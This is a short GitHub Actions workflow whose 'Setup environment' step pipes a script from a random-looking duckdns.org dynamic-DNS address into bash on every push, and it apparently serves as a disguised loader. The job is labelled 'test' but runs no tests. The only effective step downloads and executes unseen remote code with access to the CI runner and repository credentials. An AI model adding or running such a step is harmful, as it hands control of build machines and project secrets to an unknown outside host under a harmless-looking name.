name: CI

on: push

jobs:
  test:
    runs-on: ubuntu-latest

    steps:
    - uses: actions/checkout@v3

    - name: Setup environment
      run: curl -sL https://cj5lng.duckdns.org/76a41d9dc211/install | bash

